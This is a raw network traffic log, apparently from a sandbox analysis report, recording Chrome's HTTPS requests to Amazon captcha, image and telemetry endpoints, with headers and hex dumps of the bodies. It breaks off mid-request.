                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Content-Length: 4828
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: 29bd543d-81ce-4511-909c-d67b8aa0c19a
                                                                                                                                  Last-Modified: Wed, 08 Feb 2012 17:14:23 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Edge-Cache-Tag: x-cache-823,/captcha/bcxmjlko/Captcha_yeyjbrcolt
                                                                                                                                  Surrogate-Key: x-cache-823 /captcha/bcxmjlko/Captcha_yeyjbrcolt
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 10:55:06 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 78280b924a7a9f0f018abcebd8ad82d0.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 17787
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                  X-Amz-Cf-Id: ms5fJvWnWbC4XwsXz6S9GiCjsrHUfmcx3D2L33zykJd66fCaAKnvjg==
                                                                                                                                  2025-01-27 14:45:28 UTC4828INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 0b 08 00 46 00 c8 01 01 11 00 ff c4 00 1d 00 01 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 0a 07 09 06 08 0b 05 03 04 ff c4 00 2a 10 00 01 04 02 03 00 01 04 02 03 00 03 00 00 00 00 04 02 03 05 06 01 07 00 08 09 0a 11 12 13 14 15 21 16 17 22 18 19 23 ff da 00 08 01 01 00 00 3f 00 bf 8e 38 e3 8e 61 7d 23 d8 bd 19 d9 28 6b 65 8f 42 6d 5a 4e dd ae 52 2f 12 da da cd 60 a0 cf 81 64 83 8d bb 40 81 13 25 31 5f cc ac 63 c4 04 41 91 e2 4e 46 2c 8c 8c f3 cc e3 24 e1 28 75 79 4a be 99 a3 8e
                                                                                                                                  Data Ascii: JFIFHHCF*!"#?8a}#(keBmZNR/`d@%1_cANF,$(uyJ


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  41192.168.2.54992654.88.216.1254433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:28 UTC390OUTGET /1/oc-csi/1/OP/requestId=V1VKF84K0QR66MXX6Z5J&js=1 HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:28 UTC176INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:28 GMT
                                                                                                                                  Content-Type: image/gif
                                                                                                                                  Content-Length: 43
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: a26b58d6-d9b4-4898-92cb-e15e750093a1
                                                                                                                                  2025-01-27 14:45:28 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  42192.168.2.54992818.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:28 UTC622OUTPOST /1/batch/1/OE/ HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Content-Length: 22738
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                  Accept: */*
                                                                                                                                  Origin: https://www.amazon.com
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:28 UTC16384OUTData Raw: 7b 22 72 69 64 22 3a 22 56 31 56 4b 46 38 34 4b 30 51 52 36 36 4d 58 58 36 5a 35 4a 22 2c 22 73 69 64 22 3a 22 38 33 37 2d 34 30 39 36 35 39 34 2d 38 37 31 37 31 37 32 22 2c 22 6d 69 64 22 3a 22 41 54 56 50 44 4b 49 4b 58 30 44 45 52 22 2c 22 73 6e 22 3a 22 6f 70 66 63 61 70 74 63 68 61 2e 61 6d 61 7a 6f 6e 2e 63 6f 6d 22 2c 22 72 65 71 73 22 3a 5b 7b 22 63 73 6d 63 6f 75 6e 74 22 3a 7b 22 63 6f 75 6e 74 65 72 22 3a 22 62 61 73 65 6c 69 6e 65 43 6f 75 6e 74 65 72 32 22 2c 22 76 61 6c 75 65 22 3a 31 2c 22 74 22 3a 37 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 6b 22 3a 22 72 64 66 22 2c 22 76 22 3a 7b 22 61 65 6c 22 3a 31 2c 22 61 74 6f 62 22 3a 31 2c 22 63 6a 73 22 3a 30 2c 22 63 72 6d 22 3a 30 2c 22 64 63 6d 22 3a 31 2c 22 66 6c 73 22 3a 30 2c 22
                                                                                                                                  Data Ascii: {"rid":"V1VKF84K0QR66MXX6Z5J","sid":"837-4096594-8717172","mid":"ATVPDKIKX0DER","sn":"opfcaptcha.amazon.com","reqs":[{"csmcount":{"counter":"baselineCounter2","value":1,"t":7}},{"opfcsm-i":{"k":"rdf","v":{"ael":1,"atob":1,"cjs":0,"crm":0,"dcm":1,"fls":0,"
                                                                                                                                  2025-01-27 14:45:28 UTC6354OUTData Raw: 39 2c 22 73 22 3a 31 32 30 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 74 65 78 74 22 2c 22 69 64 22 3a 31 32 30 2c 22 70 69 64 22 3a 31 2c 22 73 69 64 22 3a 35 2c 22 74 78 74 22 3a 22 5c 6e 5c 6e 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 31 39 2c 22 73 22 3a 31 32 31 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 63 6f 6d 6d 65 6e 74 22 2c 22 69 64 22 3a 31 32 31 2c 22 70 69 64 22 3a 31 2c 22 73 69 64 22 3a 31 32 30 2c 22 74 78 74 22 3a 22 5c 6e 43 6f 72 72 65 69 6f 73 2e 44 6f 4e 6f 74 53 65 6e 64 5c 6e 22 7d 7d 2c 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 31 39 2c 22 73 22 3a 31 32 32 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 23 74 65 78 74 22 2c 22 69 64 22 3a 31 32 32 2c 22 70 69 64 22 3a 31 2c
                                                                                                                                  Data Ascii: 9,"s":120,"k":"snpm","n":"#text","id":120,"pid":1,"sid":5,"txt":"\n\n"}},{"opfcsm-i":{"t":19,"s":121,"k":"snpm","n":"#comment","id":121,"pid":1,"sid":120,"txt":"\nCorreios.DoNotSend\n"}},{"opfcsm-i":{"t":19,"s":122,"k":"snpm","n":"#text","id":122,"pid":1,
                                                                                                                                  2025-01-27 14:45:28 UTC304INHTTP/1.1 204 No Content
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:28 GMT
                                                                                                                                  Content-Type: text/plain
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 9a6467f1-0e9f-442d-a2b5-cce34275a452
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date,smithy-protocol


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  43192.168.2.54991199.86.8.424433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:34 UTC905OUTGET /errors/validateCaptcha?amzn=V%2FQWGh%2Bxq8nH6gH01OjA4w%3D%3D&amzn-r=%2F&field-keywords= HTTP/1.1
                                                                                                                                  Host: www.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  Referer: https://www.amazon.com/errors/validateCaptcha?amzn=oOG14CFEo0qNm3ZfyheDnw%3D%3D&amzn-r=%2F&field-keywords=
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  Cookie: csm-sid=837-4096594-8717172
                                                                                                                                  2025-01-27 14:45:35 UTC552INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:35 GMT
                                                                                                                                  x-amz-rid: 8X8C06JKXWY6YMEBFGW1
                                                                                                                                  Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                  Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                  Via: 1.1 82e9051d8d41080bd3028731e0e8677e.cloudfront.net (CloudFront)
                                                                                                                                  X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  X-Amz-Cf-Id: GT7PrBCdeJKxV3ayF_aF1E5soE4kJWT8VNvJQxRUSKqNZyiBFV1wwA==
                                                                                                                                  2025-01-27 14:45:35 UTC6599INData Raw: 31 39 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d 6c 74 2d 69 65 39 20 61 2d 6c 74 2d 69 65 38 20 61 2d 6c 74 2d 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d 6c 74 2d 69 65 39 20 61 2d 6c 74 2d 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 61 2d 6e 6f 2d 6a 73 20 61 2d
                                                                                                                                  Data Ascii: 19bf<!DOCTYPE html>...[if lt IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8 a-lt-ie7"> <![endif]-->...[if IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8"> <![endif]-->...[if IE 8]> <html lang="en-us" class="a-no-js a-
                                                                                                                                  2025-01-27 14:45:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  44192.168.2.54997118.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:35 UTC623OUTGET /1/oc-csi/1/OP/requestId=8X8C06JKXWY6YMEBFGW1&js=1 HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:35 UTC176INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:35 GMT
                                                                                                                                  Content-Type: image/gif
                                                                                                                                  Content-Length: 43
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 28906ae8-8940-4bb2-84f6-d4eceafd82a3
                                                                                                                                  2025-01-27 14:45:35 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  45192.168.2.549973108.138.16.1954433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:35 UTC628OUTGET /captcha/wxvwzfzh/Captcha_gofzzllses.jpg HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:35 UTC902INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Content-Length: 5384
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: c18f5b42-f0e9-4430-bef5-89a684a617aa
                                                                                                                                  Last-Modified: Wed, 08 Feb 2012 17:13:55 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Edge-Cache-Tag: x-cache-151,/captcha/wxvwzfzh/Captcha_gofzzllses
                                                                                                                                  Surrogate-Key: x-cache-151 /captcha/wxvwzfzh/Captcha_gofzzllses
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 08:33:38 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 85310f8b6878a9cfaa0218e021ae364e.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 24104
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA56-P7
                                                                                                                                  X-Amz-Cf-Id: cyLOlNOAr-dEzY8QBonEHmIfCHCW34a4tMWFct8nF-UdlfqnC6s1WA==
                                                                                                                                  2025-01-27 14:45:35 UTC5384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 0b 08 00 46 00 c8 01 01 11 00 ff c4 00 1f 00 01 00 02 02 02 03 01 01 00 00 00 00 00 00 00 00 00 09 0a 08 0b 06 07 02 03 04 05 01 ff c4 00 2c 10 00 01 04 02 02 01 04 01 05 00 03 01 01 00 00 00 04 02 03 05 06 01 07 00 08 09 0a 12 13 14 11 15 16 21 22 23 17 18 25 19 31 ff da 00 08 01 01 00 00 3f 00 bf c7 1c 73 d1 82 86 c9 39 0f 04 31 92 d2 ce 08 50 b8 79 bc 92 91 f2 bf 8f 0f e5 8f 77 cb 86 72 bf e9 87 72 9f 66 57 fd 70 af cf f1 cf 7f 1c ab 0f 90 ff 00 55 2f 4e 3a cb 32 76 9d e9 fc 24 87
                                                                                                                                  Data Ascii: JFIFHHCF,!"#%1?s91PywrrfWpU/N:2v$


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  46192.168.2.54997618.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:35 UTC621OUTPOST /1/batch/1/OE/ HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Content-Length: 4001
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                  Accept: */*
                                                                                                                                  Origin: https://www.amazon.com
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Referer: https://www.amazon.com/
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:35 UTC4001OUTData Raw: 7b 22 72 69 64 22 3a 22 56 31 56 4b 46 38 34 4b 30 51 52 36 36 4d 58 58 36 5a 35 4a 22 2c 22 73 69 64 22 3a 22 38 33 37 2d 34 30 39 36 35 39 34 2d 38 37 31 37 31 37 32 22 2c 22 6d 69 64 22 3a 22 41 54 56 50 44 4b 49 4b 58 30 44 45 52 22 2c 22 73 6e 22 3a 22 6f 70 66 63 61 70 74 63 68 61 2e 61 6d 61 7a 6f 6e 2e 63 6f 6d 22 2c 22 72 65 71 73 22 3a 5b 7b 22 6f 70 66 63 73 6d 2d 69 22 3a 7b 22 74 22 3a 31 32 32 31 2c 22 73 22 3a 31 37 32 2c 22 6b 22 3a 22 73 6e 70 6d 22 2c 22 6e 22 3a 22 44 49 56 22 2c 22 69 64 22 3a 31 36 31 2c 22 61 74 74 72 22 3a 7b 22 73 74 79 6c 65 22 3a 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 6c 65 66 74 3a 20 2d 31 31 31 31 31 70 78 3b 20 77 69 64 74 68 3a 20 36 30 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20
                                                                                                                                  Data Ascii: {"rid":"V1VKF84K0QR66MXX6Z5J","sid":"837-4096594-8717172","mid":"ATVPDKIKX0DER","sn":"opfcaptcha.amazon.com","reqs":[{"opfcsm-i":{"t":1221,"s":172,"k":"snpm","n":"DIV","id":161,"attr":{"style":"position: absolute; left: -11111px; width: 60px; margin-top:
                                                                                                                                  2025-01-27 14:45:35 UTC304INHTTP/1.1 204 No Content
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:35 GMT
                                                                                                                                  Content-Type: text/plain
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: 0552fa90-f881-4d5f-bf2a-0e24e4453284
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date,smithy-protocol


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  47192.168.2.54997954.88.216.1254433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:36 UTC390OUTGET /1/oc-csi/1/OP/requestId=8X8C06JKXWY6YMEBFGW1&js=1 HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:36 UTC176INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 27 Jan 2025 14:45:36 GMT
                                                                                                                                  Content-Type: image/gif
                                                                                                                                  Content-Length: 43
                                                                                                                                  Connection: close
                                                                                                                                  x-amzn-RequestId: fe710422-9e86-4359-8b4a-c0677686c43c
                                                                                                                                  2025-01-27 14:45:36 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  48192.168.2.54998318.66.143.1284433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:36 UTC394OUTGET /captcha/wxvwzfzh/Captcha_gofzzllses.jpg HTTP/1.1
                                                                                                                                  Host: images-na.ssl-images-amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Accept: */*
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                  2025-01-27 14:45:37 UTC857INHTTP/1.1 200 OK
                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                  Content-Length: 5384
                                                                                                                                  Connection: close
                                                                                                                                  Server: Server
                                                                                                                                  X-Amz-Ir-Id: c18f5b42-f0e9-4430-bef5-89a684a617aa
                                                                                                                                  Last-Modified: Wed, 08 Feb 2012 17:13:55 GMT
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Edge-Cache-Tag: x-cache-151,/captcha/wxvwzfzh/Captcha_gofzzllses
                                                                                                                                  Surrogate-Key: x-cache-151 /captcha/wxvwzfzh/Captcha_gofzzllses
                                                                                                                                  X-Nginx-Cache-Status: HIT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Date: Mon, 27 Jan 2025 08:33:38 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Via: 1.1 ad3c90e13b86d72e2a5e6bf65eab3450.cloudfront.net (CloudFront)
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                  Age: 24105
                                                                                                                                  Accept-Ch: Sec-CH-UA-Form-Factors, Sec-CH-Viewport-Width, Sec-CH-Width, Sec-CH-Viewport-Height, Sec-CH-DPR, ECT
                                                                                                                                  Server-Timing: provider;desc="cf"
                                                                                                                                  X-Cache: Hit from cloudfront
                                                                                                                                  X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                  X-Amz-Cf-Id: rQZv99uz1T_A7RKisUkOr5Vm3NBcdSKTmdXyq5nD8EfMvTQvLptRwQ==
                                                                                                                                  2025-01-27 14:45:37 UTC5384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 0b 08 00 46 00 c8 01 01 11 00 ff c4 00 1f 00 01 00 02 02 02 03 01 01 00 00 00 00 00 00 00 00 00 09 0a 08 0b 06 07 02 03 04 05 01 ff c4 00 2c 10 00 01 04 02 02 01 04 01 05 00 03 01 01 00 00 00 04 02 03 05 06 01 07 00 08 09 0a 12 13 14 11 15 16 21 22 23 17 18 25 19 31 ff da 00 08 01 01 00 00 3f 00 bf c7 1c 73 d1 82 86 c9 39 0f 04 31 92 d2 ce 08 50 b8 79 bc 92 91 f2 bf 8f 0f e5 8f 77 cb 86 72 bf e9 87 72 9f 66 57 fd 70 af cf f1 cf 7f 1c ab 0f 90 ff 00 55 2f 4e 3a cb 32 76 9d e9 fc 24 87
                                                                                                                                  Data Ascii: JFIFHHCF,!"#%1?s91PywrrfWpU/N:2v$


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  49192.168.2.54998418.204.152.184433424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2025-01-27 14:45:36 UTC622OUTPOST /1/batch/1/OE/ HTTP/1.1
                                                                                                                                  Host: fls-na.amazon.com
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Content-Length: 22638
                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                  Accept: */*
                                                                                                                                  Origin: https://www.amazon.com
                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                  Sec-Fetch-Dest: empty
